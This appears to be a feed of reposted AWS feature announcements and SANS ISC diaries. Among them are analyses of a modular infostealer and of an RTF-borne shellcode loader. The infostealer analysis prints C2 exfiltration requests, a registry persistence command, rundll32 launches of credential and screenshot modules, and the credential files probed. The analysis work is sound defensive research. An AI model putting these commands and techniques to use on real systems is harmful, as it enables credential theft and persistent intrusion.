CloudWatch Metric Streams – Send AWS Metrics to Partners and to Your Apps in Real Time

This post was originally published on this site

When we launched Amazon CloudWatch back in 2009 (New Features for Amazon EC2: Elastic Load Balancing, Auto Scaling, and Amazon CloudWatch), it tracked performance metrics (CPU load, Disk I/O, and network I/O) for EC2 instances, rolled them up at one-minute intervals, and stored them for two weeks. At that time it was used to monitor instance health and to drive Auto Scaling. Today, CloudWatch is a far more comprehensive and sophisticated service. Some of the most recent additions include metrics with 1-minute granularity for all EBS volume types, CloudWatch Lambda Insights, and the Metrics Explorer.

AWS Partners have used CloudWatch metrics to create all sorts of monitoring, alerting, and cost management tools. In order to access the metrics, the partners created polling fleets that call the ListMetrics and GetMetricData functions for each of their customers.

These fleets must scale in proportion to the number of AWS resources created by each of the partners’ customers and the number of CloudWatch metrics that are retrieved for each resource. This polling is simply undifferentiated heavy lifting that each partner must do. It adds no value, and takes precious time that could be better invested in other ways.
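That polling pattern can be sketched as follows — a sketch only, assuming boto3 is configured with credentials; the helper names are mine, not from the post:

```python
import datetime as dt

def build_queries(metrics, period=60, stat="Average"):
    """Turn ListMetrics results into GetMetricData queries (the API caps at 500 per call)."""
    return [
        {"Id": f"m{i}",
         "MetricStat": {"Metric": m, "Period": period, "Stat": stat}}
        for i, m in enumerate(metrics)
    ]

def poll_recent_metrics(region="us-east-1", minutes=10):
    """One polling pass: enumerate every metric, then fetch its recent datapoints."""
    import boto3  # imported lazily so build_queries() works without boto3 installed
    cw = boto3.client("cloudwatch", region_name=region)
    end = dt.datetime.utcnow()
    start = end - dt.timedelta(minutes=minutes)
    for page in cw.get_paginator("list_metrics").paginate():
        queries = build_queries(page["Metrics"])
        if queries:
            yield cw.get_metric_data(MetricDataQueries=queries,
                                     StartTime=start, EndTime=end)
```

Multiply one such loop by every customer account, and the scaling problem the partners face becomes obvious.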

New Metric Streams
CloudWatch Side Menu (Dashboards, Alarms, Metrics, and more)

In order to make it easier for AWS Partners and others to gain access to CloudWatch metrics faster and at scale, we are launching CloudWatch Metric Streams. Instead of polling (which can result in 5 to 10 minutes of latency), metrics are delivered to a Kinesis Data Firehose stream. This is highly scalable and far more efficient, and supports two important use cases:

Partner Services – You can stream metrics to a Kinesis Data Firehose that writes data to an endpoint owned by an AWS Partner. This allows partners to scale down their polling fleets substantially, and lets them build tools that can respond more quickly when key cost or performance metrics change in unexpected ways.

Data Lake – You can stream metrics to a Kinesis Data Firehose of your own. From there you can apply any desired data transformations, and then push the metrics into Amazon Simple Storage Service (S3) or Amazon Redshift. You then have the full array of AWS analytics tools at your disposal: S3 Select, Amazon SageMaker, Amazon EMR, Amazon Athena, Amazon Kinesis Data Analytics, and more. Our customers do this to combine billing and performance data in order to measure & improve cost optimization, resource performance, and resource utilization.

CloudWatch Metric Streams are fully managed and very easy to set up. Streams can scale to handle any volume of metrics, with delivery to the destination within two or three minutes. You can choose to send all available metrics to each stream that you create, or you can opt in to any of the available AWS (EC2, S3, and so forth) or custom namespaces.

Once a stream has been set up, metrics start to flow within a minute or two. The flow can be stopped and restarted later if necessary, which can be handy for testing and debugging. When you set up a stream, you choose between the binary OpenTelemetry 0.7 format and the human-readable JSON format.

Each Metric Stream resides in a particular AWS region and delivers metrics to a single destination. If you want to deliver metrics to multiple partners, you will need to create a Metric Stream for each one. If you are creating a centralized data lake that spans multiple AWS accounts and/or regions, you will need to set up some IAM roles (see Controlling Access with Amazon Kinesis Data Firehose for more information).

Creating a Metric Stream
Let’s take a look at two ways to use a Metric Stream. First, I will use the Quick S3 setup option to send data to a Kinesis Data Firehose and from there to S3. Second, I will use a Firehose that writes to an endpoint at AWS Partner New Relic.

I open the CloudWatch Console, select the desired region, and click Streams in the left-side navigation. I review the page, and click Create stream to proceed:

CloudWatch Metric Streams Home Page in Console

I choose the metrics to stream. I can select All metrics and then exclude those that I don’t need, or I can click Selected namespaces and include those that I need. I’ll go for All, but exclude Firehose:

Create a Metric Stream - Part 1, All or Selected

I select Quick S3 setup, and leave the other configuration settings in this section unchanged (I expanded it so that you could see all of the options that are available to you):

Create a Metric Stream - Options for S3 bucket and IAM roles

Then I enter a name (MyMetrics-US-East-1A) for my stream, confirm that I understand the resources that will be created, and click Create metric stream:

Set name for Metric Stream and confirm resources to be created

My stream is created and active within seconds:

Metric Stream is Active

Objects begin to appear in the S3 bucket within a minute or two:

Objects appear in S3 Bucket

I can analyze my metrics using any of the tools that I listed above, or I can simply look at the raw data:

A single Metrics object, shown in NotePad++, JSON format
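The general shape of a JSON-format record can be illustrated like this. The record below is hand-made for illustration (field names follow the Metric Streams JSON output, one JSON object per line; all values are invented):

```python
import json

# Hypothetical record modeled on the Metric Streams JSON output format
sample = (
    '{"metric_stream_name":"MyMetrics-US-East-1A","account_id":"123456789012",'
    '"region":"us-east-1","namespace":"AWS/EC2","metric_name":"CPUUtilization",'
    '"dimensions":{"InstanceId":"i-0123456789abcdef0"},"timestamp":1617181860000,'
    '"value":{"max":1.2,"min":0.3,"sum":4.5,"count":5.0},"unit":"Percent"}'
)

def parse_records(blob: str):
    """Each line of a delivered object is one metric update in JSON form."""
    return [json.loads(line) for line in blob.splitlines() if line.strip()]

records = parse_records(sample)
# The stream delivers min/max/sum/count; an average is derived, not delivered.
average = records[0]["value"]["sum"] / records[0]["value"]["count"]
```

Note that statistics arrive pre-aggregated per period, so anything beyond min/max/sum/count has to be computed downstream.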

Each Metric Stream generates its own set of CloudWatch metrics:

Metrics for the metrics stream

I can stop a running stream:

How to stop a running stream

And then start it:

How to start a stopped stream

I can also create a Metric Stream using a CloudFormation template. Here’s an excerpt:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  MyMetricStream:               # logical resource name added to make the excerpt valid
    Type: 'AWS::CloudWatch::MetricStream'
    Properties:
      OutputFormat: json
      RoleArn: !GetAtt
        - MetricStreamToFirehoseRole
        - Arn
      FirehoseArn: !GetAtt
        - FirehoseToS3Bucket
        - Arn

Now let’s take a look at the Partner-style use case! The team at New Relic set me up with a CloudFormation template that created the necessary IAM roles and the Metric Stream. I simply entered my API key and an S3 bucket name and the template did all of the heavy lifting. Here’s what I saw:

Metrics displayed in the New Relic UI

Things to Know
And that’s about it! Here are a couple of things to keep in mind:

Regions – Metric Streams are now available in all commercial AWS Regions, excluding the AWS China (Beijing) Region and the AWS China (Ningxia) Region. As noted earlier, you will need to create a Metric Stream in each desired account and region (this is a great use case for CloudFormation StackSets).

Pricing – You pay $0.003 for every 1000 metric updates, and for any charges associated with the Kinesis Data Firehose. To learn more, check out the pricing page.

Metrics – CloudWatch Metric Streams is compatible with all CloudWatch metrics, but does not send metrics that have a timestamp that is more than two hours old. This includes S3 daily storage metrics and some of the billing metrics.

Partner Services
We designed this feature with the goal of making it easier & more efficient for AWS Partners including Datadog, Dynatrace, New Relic, Splunk, and Sumo Logic to get access to metrics so that the partners can build even better tools. We’ve been working with these partners to help them get started with CloudWatch Metric Streams. Here are some of the blog posts that they wrote in order to share their experiences. (I am updating this article with links as they are published.)

Now Available
CloudWatch Metric Streams is available now and you can use it to stream metrics to a Kinesis Data Firehose of your own or to one owned by an AWS Partner. For more information, check out the documentation and send feedback to the AWS forum for Amazon CloudWatch.


Quick Analysis of a Modular InfoStealer, (Wed, Mar 31st)

This post was originally published on this site

This morning, an interesting phishing email landed in my spam trap. The mail was written in Spanish and, as usual, asked the recipient to urgently process the attached document. The filename was "AVISO.001" (this extension is used by multi-volume archives). The archive contained a PE file with a very long name: AVISO11504122921827776385010767000154304736120425314155656824545860211706529881523930427.exe (SHA256:ff834f404b977a475ef56f1fa81cf91f0ac7e07b8d44e0c224861a3287f47c8c). The file is unknown on VT at this time, so I did a quick analysis.

It first performs a quick review of the target and exfiltrates the collected information:

POST /7Ndd3SnW/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176[.]111[.]174[.]67
Content-Length: 83
Cache-Control: no-cache


You can see the name of the computer ("pc=") and the user ("un="). No AV is running ("av=0"). There is a randomly generated ID, and what looks like a version of the malware or campaign ("vs=").
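The beacon body is a plain x-www-form-urlencoded string, so dissecting one is trivial. The sample body below is reconstructed with invented values, modeled on the fields described above:

```python
from urllib.parse import parse_qs

# Hypothetical beacon body; field names match the description above, values invented
body = "id=68435943200745201&vs=1.24&pc=DESKTOP-01&un=user01&av=0"

# Flatten parse_qs()'s list values into single strings for readability
fields = {k: v[0] for k, v in parse_qs(body).items()}
print(fields["pc"], fields["un"], fields["av"])
```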

The next step is to drop itself into C:\ProgramData\11ab573a3\rween.exe. This malware is modular and downloads two DLLs located on the C2 server:

Those DLLs are known on VT [1][2]:

remnux@remnux:/MalwareZoo/20210331$ shasum -a 256 *.dll
6f917b86c623a4ef2326de062cb206208b25d93f6d7a2911bc7c10f7c83ffd64  cred.dll
3d0efa67d54ee1452aa53f35db5552fe079adfd14f1fe312097b266943dd9644  scr.dll
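The same hashes can be computed without shasum, e.g. in Python:

```python
import hashlib

def sha256sum(path: str, chunk_size: int = 1 << 20) -> str:
    """Hex SHA-256 of a file, read in chunks so large samples don't fill RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()
```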

Persistence is achieved via a registry change: the Startup value under the User Shell Folders key is redirected, so anything in the location it points to is launched at logon/reboot.

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\11ab573a3
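A crude hunting check for this persistence trick can flag command lines that redirect the Startup shell folder. This is a sketch of the matching logic only, not a complete detection:

```python
import re

def flags_startup_redirect(cmdline: str) -> bool:
    """True if a command line REG ADDs the 'Startup' value under User Shell Folders."""
    lowered = cmdline.lower()
    return ("reg add" in lowered
            and "user shell folders" in lowered
            and re.search(r"/v\s+startup\b", lowered) is not None)
```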

The DLLs are not loaded into the main program with LoadLibrary(); instead, they are launched via rundll32:

"C:\Windows\System32\rundll32.exe" C:\ProgramData\5eba991cccd123\cred.dll, Main
"C:\Windows\System32\rundll32.exe" C:\ProgramData\5eba991cccd123\scr.dll, Main

Once the DLLs are launched, the exfiltration of data starts:

cred.dll is responsible for searching for credentials. Examples of probes detected:

  • Outlook (HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook)
  • FileZilla (C:\Users\user01\AppData\Roaming\FileZilla\sitemanager.xml)
  • Purple (C:\Users\user01\AppData\Roaming\.purple\accounts.xml)

Data is then exfiltrated:

POST //7Ndd3SnW/index.php HTTP/1.1
Content-Length: 21
Content-Type: application/x-www-form-urlencoded


(In my sandbox, my credentials were available.)

scr.dll is used to take screenshots at regular intervals and also exfiltrates them:

POST //7Ndd3SnW/index.php?scr=up HTTP/1.1
User-Agent: Uploador
Content-Type: multipart/form-data; boundary=152140224449.jpg
Connection: Keep-Alive
Content-Length: 34758

Content-Disposition: form-data; name="data"; filename="152140224449.jpg"
Content-Type: application/octet-stream

......JFIF.............C.......... (data removed)

Note the nice User-Agent: "Uploador". I found references to this string back in 2015![3].

Here is a screenshot of the C2 panel, a good old Amadey:

Even if the malware looks old-fashioned, it remains effective and has already claimed some victims. I found a lot of screenshots (461) on the C2 server:


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Troubleshoot Boot and Networking Issues with New EC2 Serial Console

This post was originally published on this site

Fixing production issues is one of the key responsibilities of system and network administrators. In fact, I’ve always found it to be one of the most interesting parts of infrastructure engineering. Diving as deep as needed into the problem at hand, not only do you (eventually) have the satisfaction of solving the issue, you also learn a lot of things along the way, which you probably wouldn’t have been exposed to under normal circumstances.

Operating systems certainly present such opportunities. Over time, they’ve grown ever more complex, forcing administrators to master a zillion configuration files and settings. Although infrastructure as code and automation have greatly improved provisioning and managing servers, there’s always room for mistakes and breakdowns that prevent a system from starting correctly. The list is endless: missing hardware drivers, misconfigured file systems, invalid network configuration, incorrect permissions, and so on. To make things worse, many issues can effectively lock administrators out of a system, preventing them from logging in, diagnosing the problem and applying the appropriate fix. The only option is to have an out-of-band connection to your servers, and although customers could view the console output of an EC2 instance, they couldn’t interact with it – until now.

Today, I’m extremely happy to announce the EC2 Serial Console, a simple and secure way to troubleshoot boot and network connectivity issues by establishing a serial connection to your Amazon Elastic Compute Cloud (EC2) instances.

Introducing the EC2 Serial Console
EC2 Serial Console access is available for EC2 instances based on the AWS Nitro System. It supports all major Linux distributions, FreeBSD, NetBSD, Microsoft Windows, and VMware.

Without any need for a working network configuration, you can connect to an instance using either a browser-based shell in the AWS Management Console, or an SSH connection to a managed console server. No need for an sshd server to be running on your instance: the only requirement is that the root account has been assigned a password, as this is the one you will use to log in. Then, you can enter commands as if you have a keyboard and monitor directly attached to one of the instance’s serial ports.

In addition, you can trigger operating system specific procedures:

  • On Linux, you can trigger a Magic SysRq command to generate a crash dump, kill processes, and so on.
  • On Windows, you can interrupt the boot process, and boot in safe mode using Emergency Management Service (EMS) and Special Admin Console (SAC).

Getting access to an instance’s console is a privileged operation that should be tightly controlled, which is why EC2 Serial Console access is not permitted by default at the account level. Once you permit access in your account, it applies to all instances in this account. Administrators can also apply controls at the organization level thanks to Service Control Policies, and at instance level thanks to AWS Identity and Access Management (IAM) permissions. As you would expect, all communication with the EC2 Serial Console is encrypted, and we generate a unique key for each session.

Let’s do a quick demo with Linux. The process is similar with other operating systems.

Connecting to the EC2 Serial Console with the AWS Management Console
First, I launch an Amazon Linux 2 instance. Logging in to it, I decide to mangle the network configuration for its Ethernet network interface (/etc/sysconfig/network-scripts/ifcfg-eth0), setting a completely bogus static IP address. PLEASE do not try this on a production instance!

Then, I reboot the instance. A few seconds later, although the instance is up and running in the EC2 console and port 22 is open in its Security Group, I’m unable to connect to it with SSH.

$ ssh -i ~/.ssh/mykey.pem
ssh: connect to host port 22: Operation timed out

EC2 Serial Console to the rescue!

First, I need to allow console access in my account. All it takes is ticking a box in the EC2 settings.

Enabling the console

Then, right clicking on the instance’s name in the EC2 console, I select Monitor and troubleshoot; then EC2 Serial Console.

This opens a new window confirming the instance id and the serial port number to connect to. I simply click on Connect.

This opens a new tab in my browser. Hitting Enter, I see the familiar login prompt.

Amazon Linux 2
Kernel 4.14.225-168.357.amzn2.x86_64 on an x86_64
ip-172-31-67-148 login:

Logging in as root, I’m relieved to get a friendly shell prompt.

Enabling Magic SysRq for this session (sysctl -w kernel.sysrq=1), I first list available commands (CTRL-0 + h), and then ask for a memory report (CTRL-0 + m). You can click on the image below to get a larger view.

Connecting to the console

Pretty cool! This would definitely come in handy to troubleshoot complex issues. No need for this here: I quickly restore a valid configuration for the network interface, and I restart the network stack.

Trying to connect to the instance again, I can see that the problem is solved.

$ ssh -i ~/.ssh/mykey.pem

       __|  __|_  )
       _|  (     /   Amazon Linux 2 AMI
      ___|\___|___|
[ec2-user@ip-172-31-67-148 ~]$

Now, let me quickly show you the equivalent commands using the AWS command line interface.

Connecting to the EC2 Serial Console with the AWS CLI
This is equally simple. First, I send the SSH public key for the instance key pair to the serial console. Please make sure to add the file:// prefix.

$ aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-003aecec198b537b0 --ssh-public-key file://~/.ssh/ --serial-port 0 --region us-east-1

Then, I ssh to the serial console, using <instance id>.port<port number> as user name, and I’m greeted with a login prompt.

$ ssh -i ~/.ssh/mykey.pem

Amazon Linux 2
Kernel 4.14.225-168.357.amzn2.x86_64 on an x86_64
ip-172-31-67-148 login:
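Composing that user name is simple enough to wrap in a helper. A small sketch — the serial console endpoint host name here is an assumption for illustration; check the documentation for the endpoint in your region:

```python
def serial_console_target(instance_id: str, port: int = 0,
                          region: str = "us-east-1") -> str:
    """Build the user@host string for an EC2 Serial Console SSH session.

    The endpoint host name below is assumed, not taken from the post.
    """
    user = f"{instance_id}.port{port}"
    host = f"serial-console.ec2-instance-connect.{region}.aws"
    return f"{user}@{host}"

print(serial_console_target("i-003aecec198b537b0"))
```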

Once I’ve logged in, Magic SysRq is available, and I can trigger it with ~B+command. I can also terminate the console session with ~..

Get Started with EC2 Serial Console
As you can see, the EC2 Serial Console makes it much easier to debug and fix complex boot and network issues happening on your EC2 instances. You can start using it today in the following AWS regions, at no additional cost:

  • US East (N. Virginia), US West (Oregon), US East (Ohio)
  • Europe (Ireland), Europe (Frankfurt)
  • Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Singapore)

Please give it a try, and let us know what you think. We’re always looking forward to your feedback! You can send it through your usual AWS Support contacts, or on the AWS Forum for Amazon EC2.

– Julien



Old TLS versions – gone, but not forgotten… well, not really "gone" either, (Tue, Mar 30th)

This post was originally published on this site

With the recent official deprecation of TLS 1.0 and TLS 1.1 by RFC 8996[1], a step, which has long been in preparation and which was preceded by many recommendations to discontinue the use of both protocols (as well as by the removal of support for them from all mainstream web browsers[2]), one might assume that the use of old TLS versions on the internet would have significantly decreased over the last few months. This has however not been the case.

According to Shodan, at the time of writing, TLS 1.0 and TLS 1.1 are still supported by over 50% of web servers on the internet (50.15% and 50.08% respectively). We’ll leave aside the potentially much more problematic 7.2% of web servers that still support SSL 3.0 and 1.6% of servers that support SSL 2.0…

What is interesting about the percentages for TLS 1.0 and TLS 1.1 is that both are almost the same as they were six months ago. As the following chart shows, there appeared to be a fairly significant decrease in support of both protocols between the second half of October 2020 and the end of January 2021, which was however followed by a later sharp increase, after which the percentages plateaued at around the current values.

The still significant support for TLS 1.1 and TLS 1.0 is hardly a major problem since, although these protocols can’t be called “secure” by today’s standards, most browsers won’t use them unless specifically configured to do so. The fact that the percentage of publicly accessible web servers that still support the historical TLS versions didn’t decrease significantly in the last six months is, however, certainly noteworthy.
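Checking whether a given server still accepts an old TLS version is straightforward with Python's ssl module. A sketch, with one caveat noted in the docstring:

```python
import socket
import ssl

def accepts_tls_version(host: str, version: "ssl.TLSVersion",
                        port: int = 443, timeout: float = 5.0) -> bool:
    """Attempt a handshake pinned to a single TLS version; True if it completes.

    Caveat: a modern local OpenSSL may itself refuse TLS 1.0/1.1 regardless of
    the server, so a False result is only meaningful if the client allows the
    version being tested.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = version  # pin both bounds to a single version
    ctx.maximum_version = version
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return True
    except (ssl.SSLError, OSError):
        return False
```

For example, `accepts_tls_version("example.org", ssl.TLSVersion.TLSv1)` would probe a single host for TLS 1.0 support.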

To end on a positive note, TLS 1.3 is now supported by over 25% of web servers (25.22% to be specific), as you may have noticed in the first chart. It seems that even if old TLS versions will not leave us any time soon, support for the new and secure version of the protocol is certainly slowly increasing[3].


Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Jumping into Shellcode, (Mon, Mar 29th)

This post was originally published on this site

Malware analysis is exciting because you never know what you will find. In previous diaries[1], I already explained why it's important to have a look at groups of interesting Windows API calls to detect certain behaviors. The classic example is code injection. Usually, it is based on something like this:

1. You allocate some memory
2. You get a shellcode (downloaded, extracted from a specific location like a section, a resource, …)
3. You copy the shellcode in the newly allocated memory region
4. You create a new thread to execute it.

But it's not always like this! Last week, I worked on an incident involving a malicious DLL that I analyzed. The technique used to execute the shellcode was slightly different and therefore interesting to describe here.

The DLL was delivered on the target system with an RTF document. This file contained the shellcode:

remnux@remnux:/MalwareZoo/20210318$ suspicious.rtf
    1 Level  1        c=    3 p=00000000 l=    1619 h=     143;       5 b=       0   u=     539 rtf1
    2  Level  2       c=    2 p=00000028 l=      91 h=       8;       2 b=       0   u=      16 fonttbl
    3   Level  3      c=    0 p=00000031 l=      35 h=       3;       2 b=       0   u=       5 f0
    4   Level  3      c=    0 p=00000056 l=      44 h=       5;       2 b=       0   u=      11 f1
    5  Level  2       c=    0 p=00000087 l=      33 h=       0;       4 b=       0   u=       2 colortbl
    6  Level  2       c=    0 p=000000ac l=      32 h=      13;       5 b=       0   u=       5 *generator
    7 Remainder       c=    0 p=00000655 l=  208396 h=   17913;       5 b=       0   u=  182176 
      Whitespace = 4878  NULL bytes = 838  Left curly braces = 832  Right curly braces = 818

This file is completely valid from an RTF format point of view, opens successfully, and renders a fake document. But the attacker appended the shellcode at the end of the file (have a look at stream 7, which has a larger size and a lot of unexpected characters ("u=")). Let's try to have a look at the shellcode:

remnux@remnux:/MalwareZoo/20210318$ suspicious.rtf -s 7 | head -20
00000000: 0D 0A 00 6E 07 5D A7 5E  66 D2 97 1F 65 31 FD 7E  ...n.].^f...e1.~
00000010: D9 8E 9A C4 1C FC 73 79  F0 0B DA EA 6E 06 C3 03  ......sy....n...
00000020: 27 7C BD D7 23 84 0B BD  73 0C 0F 8D F9 DF CC E7  '|..#...s.......
00000030: 88 B9 97 06 A2 F9 4D 8C  91 D1 5E 39 A2 F5 9A 7E  ......M...^9...~
00000040: 4C D6 C8 A2 2D 88 D0 C4  16 E6 2B 1C DA 7B DD F7  L...-.....+..{..
00000050: C4 FB 61 34 A6 BE 8E 2F  9D 7D 96 A8 7E 00 E2 E8  ..a4.../.}..~...
00000060: BB A2 D9 53 1C F3 49 81  77 93 30 16 11 9D 88 93  ...S..I.w.0.....
00000070: D2 6C 9D 56 60 36 66 BA  29 3E 73 45 CE 1A BE E3  .l.V`6f.)>sE....
00000080: 5A C7 96 63 E0 D7 DF C9  21 2F 56 81 BD 84 6C 2D  Z..c....!/V...l-
00000090: CF 4C 4E BE 90 23 47 DC  A7 A9 8E A2 C3 A3 2E D1  .LN..#G.........

It looks encrypted, and a brute force of a single-byte XOR encoding was not successful. Let's see how it works in a debugger.
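For reference, a single-byte XOR brute force like the one that failed here can be sketched as follows, scoring candidates by their ratio of printable characters:

```python
def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key."""
    return bytes(b ^ key for b in data)

def printable_ratio(data: bytes) -> float:
    """Fraction of bytes in the printable ASCII range."""
    return sum(32 <= b < 127 for b in data) / max(len(data), 1)

def brute_force_xor(data: bytes, threshold: float = 0.95):
    """Yield (key, candidate) pairs whose decoding is mostly printable text."""
    for key in range(256):
        candidate = xor_single(data, key)
        if printable_ratio(candidate) >= threshold:
            yield key, candidate
```

When this approach turns up nothing, as in this case, the key is usually longer or generated at runtime, which is exactly what the debugger session shows below.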

First, the RTF file is opened to get a handle and its size is fetched with GetFileSize(). Then, a classic VirtualAlloc() is used to allocate a memory space equal to the size of the file. Note the "push 40" which means that the memory will contain executable code (PAGE_EXECUTE_READWRITE):


Usually, the shellcode is extracted from the file by reading the exact number of bytes: the malware seeks to the position where the shellcode starts in the file and reads bytes until the EOF. In this case, the complete RTF file is read and then copied into the newly allocated memory:
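As an aside, carving such appended data out of an RTF can be sketched by walking the brace nesting and keeping whatever follows the outermost closing brace. This is deliberately naive (it only skips the character after a backslash to avoid escaped braces; a robust parser would do more):

```python
def rtf_remainder(data: bytes) -> bytes:
    """Return the bytes appended after the RTF's outermost closing brace."""
    depth = 0
    i = 0
    while i < len(data):
        b = data[i]
        if b == 0x5C:          # backslash: skip the escaped/next character
            i += 2
            continue
        if b == 0x7B:          # '{'
            depth += 1
        elif b == 0x7D:        # '}'
            depth -= 1
            if depth == 0:
                return data[i + 1:]
        i += 1
    return b""                 # nothing appended (or unbalanced braces)
```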

This is the interesting part of the code which processes the shellcode:

The first line "mov word ptr ss:[ebp-18], 658" defines where the shellcode starts in the memory map. In a loop, all characters are XOR'd with a key that is generated in the function desktop.70901100. The next step is to jump to the location of the decoded shellcode:

The address to jump to is based on the address of the newly allocated memory (0x2B30000) + the offset (658). Let's have a look at this location (0x2B30658):

Sounds good, we have a NOP sled at this location + the string "MZ". Let's execute the unconditional JMP:

We reached our shellcode! Note the NOP instructions and also the method used to get the EIP:

02B30665 | E8 00000000 | call 2B3066A | call $0
02B3066A | 5B          | pop ebx      | 

Now the shellcode will execute and perform the next stages of the infection…


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TCPView v4.0 Released, (Sun, Mar 28th)

This post was originally published on this site

TCPView is a Sysinternals tool that displays information about the TCP and UDP endpoints on a system. It's like netstat, but with a GUI.

This new version brings some major new features: service identification, creation time and searching:

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Malware Analysis with elastic-agent and Microsoft Sandbox, (Fri, Mar 26th)

This post was originally published on this site

Microsoft describes it as follows: "Windows Sandbox supports simple configuration files, which provide a minimal set of customization parameters for Sandbox. […] Windows Sandbox configuration files are formatted as XML and are associated with Sandbox via the .wsb file extension."[6]

Since the latest version of the elastic-agent (7.11+) supports antivirus detection, I followed the instructions listed here [1] to configure an agent to test its detection capabilities. For my workstation, I used VMware with a fully patched Windows 10 and saved the current configuration with a snapshot. I wanted to combine both of these features, the elastic-agent and the Microsoft sandbox [4][5][6], to analyze my malware sample. Since the Microsoft sandbox doesn't retain anything after it is shut down, I figured this would be a good alternative to restoring my previous VMware snapshot every time I tested a suspicious file.

One minor inconvenience: if I want to use the agent, I need to add it to Elasticsearch every time. If the elastic-agent isn't installed, Microsoft Defender is enabled. Here is a list of tools to either install or consider installing in the sandbox when it starts:

  • Elastic-agent with malware policy (in VMware client and Sandbox client)
  • MS SysMon
  • MS TCPView
  • Consider adding: PowerShell Script Block Logging, example here
  • Wireshark to capture traffic from host
  • Other browsers: Chrome & Firefox
  • PeStudio
  • Python
  • Internet Services Simulation Suite: INetSim
  • Didier Stevens suite of tools
  • Proxy setup on VMware client to monitor traffic
  • Any other tools you might find useful during the analysis such as this package by @mentebinaria

When starting the sandbox with a script configured for this purpose (MalwareAnalysis.wsb), it can automatically load the tools needed with a batch file. Here is my example:


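A minimal MalwareAnalysis.wsb along the documented schema might look like this. The mapped folder and logon command are assumptions matching the batch file described below (mapped folders appear on the WDAGUtilityAccount desktop):

```xml
<Configuration>
  <MappedFolders>
    <MappedFolder>
      <!-- Host folder holding the tools; path is an assumption -->
      <HostFolder>C:\Sandbox</HostFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <!-- Runs the setup batch file at sandbox logon -->
    <Command>C:\Users\WDAGUtilityAccount\Desktop\Sandbox\SBConfig.bat</Command>
  </LogonCommand>
</Configuration>
```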
Because everything is deleted when you shut down the sandbox (including the browser, which must be reloaded at its current version every time), I needed a way to automatically start/add/load/update what I needed to perform some basic analysis. I use a batch file preconfigured with everything required to accomplish this task. Here is what I have (C:\Sandbox\SBConfig.bat):

REM Copy elastic-agent to C:\Program Files
C:\Windows\System32\xcopy.exe /i /s C:\Users\WDAGUtilityAccount\Desktop\Sandbox\elastic-agent "C:\Program Files\elastic-agent"

REM Install Sysmon64, vcredist_x86
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Sysmon64.exe -i -accepteula
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\vcredist_x86.exe /q

REM Add Elastic certificate authority to Sandbox
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ca.crt
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\stargate.crt

REM Install new Microsoft Edge
start /wait C:\Users\WDAGUtilityAccount\Desktop\Sandbox\MicrosoftEdgeEnterpriseX64.msi /quiet /norestart

REM Install Python
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\python-3.9.2-amd64.exe /quiet InstallAllUsers=1 PrependPath=1 Include_test=0

REM Execute PowerShell scripts
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ChangeExecutionPolicy.ps1
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ScriptBlockLogging.ps1

REM Install Wireshark
REM Install npcap manually. Silent only supported with OEM
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Wireshark-win64-3.4.4.exe /S /D /desktopicon=yes

The npcap installer runs last because I'm using the free edition rather than the OEM edition (only the OEM edition supports silent installs), so it asks the user to finish the installation after it starts. Before enabling ScriptBlockLogging in the Sandbox, I need to set the PowerShell ExecutionPolicy to RemoteSigned. This is the command in my script that makes the change (ChangeExecutionPolicy.ps1):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

To verify the change was applied, as PowerShell admin, execute the following command:

Get-ExecutionPolicy -List

Producing the following result:

Following the example listed in this Elastic blog, it is time to create a policy and add the elastic-agent to Elasticsearch (pre-copied with the batch file SBConfig.bat) to run the sample file and monitor its activity. This is the four-application part of the policy I configured for my agent:

After launching the script MalwareAnalysis.wsb to start the Sandbox and load, copy, and install all the applications from the batch file, it is time to add the elastic-agent to the server; I am then ready to launch the suspected malware file for analysis. Last month, a crypto miner file, photo.scr, was uploaded to my honeypot, and I'm going to use this file to test the elastic-agent's analysis.

To view the results in Kibana, I navigate to Security -> Overview -> Detection alert trend. I look for activity that would indicate an alert triggered by malware, filter for the value, then use View alerts to examine the flow of the activity. I can then select Analyze to see what this photo.scr file accessed or installed on the client. The agent captured 3 alerts:

Next is to expand one of those alerts and analyze the activity. The elastic-agent identified 1 library, 53 network, and 7 registry events:

Network Activity

Registry Activity

Each one of these can be expanded to drill further into what happened on the host.

Indicator of Compromise

807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  Photo.scr
